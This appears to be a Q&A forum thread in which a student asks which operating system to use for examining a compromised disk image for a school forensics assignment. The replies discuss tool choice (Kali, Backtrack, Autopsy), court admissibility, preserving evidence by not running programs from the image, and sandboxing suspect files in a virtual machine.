I have been given an assignment from my school, in wich I have been given a Virtual image of a compromised system. The first thing I need to do is setup a environment to wich we can mount the image. I need to choose an OS, and I was wondering: What should I choose, and why? If anyone could give me any pointers I should look out for, it would be much appreciated! Thanks

Use whatever operating system you feel comfortable with and has the ability to run the tools you need. An investigation into a compromised system can get very technical, and I have a feeling you might want to leverage tools available for Windows and *nix distros to investigate this. Your job is to know how to use these tools to discover data of relevance, then leverage similar tools to help validate your findings. Figure out what you want to look for, figure out what tools help find those artifacts, then choose the OS accordingly. You'll soon find there is no best OS for an examiner.
–
0xhughesFeb 10 '14 at 17:17

Beware with this. In a trial you will face questions like "so, these programs could be modified by anyone?" and "How can you be sure your system hasn't compromised the original image?". In a trial a lot of forensics expert will go to paid proprietary systems, since they are easier to comprehend for judges and lawyers.
–
kiBytesFeb 10 '14 at 12:23

3

@kiBytes Good points, thanks. After the NSA scandal, though, similar questions could be asked about proprietary software. (Whether they will convince a judge or jury is another story!) Either way, the OP did well to perform analysis on copies of the image.
–
S.L. BarthFeb 10 '14 at 12:28

2

In an academic environment I believe a distro like Kali is a perfect choice. In a trial there are some known brands most forensics choose to use (although they may use a Linux Distro to help themselves).
–
kiBytesFeb 10 '14 at 12:31

When I was at university I used Backtrack Linux a LOT. It has a lot of forensics (and live forensics) tools preinstalled and it is designed to be used for these purposes - (albeit it is probably most famous for nefarious hacking and spying on suspected cow tippers etc)

It depends on the tool you choose. Forensic tools like Autopsy can run on several different operating systems. They can parse the filesystem of the image you've been given, and show you the contents of the files. If such a tool is written in Java, you can run it on Windows, Mac, or Linux.

In forensic work, you are not necessarily trying to "run" the software from the image. You often are simply looking at the files you collect from the system, and piecing together what happened based on file contents, file system attributes such as last-accessed-time, creator ID, etc. If you were to mount the file system in the OS and run programs that accessed those files, your own investigative activity would likely hide the very clues you are seeking to uncover.

But sometimes you won't have much of a choice. If you discover a file named foo.docx, a simple text editor will show you very little, and you will likely need to use Word to view it. That creates another problem: what if the file you're trying to examine contains a virus? Opening it in Word on your computer could subject you to exactly the same problems as the victim computer image you're looking at. In that case, you need to learn to use a virtual machine as a sandbox.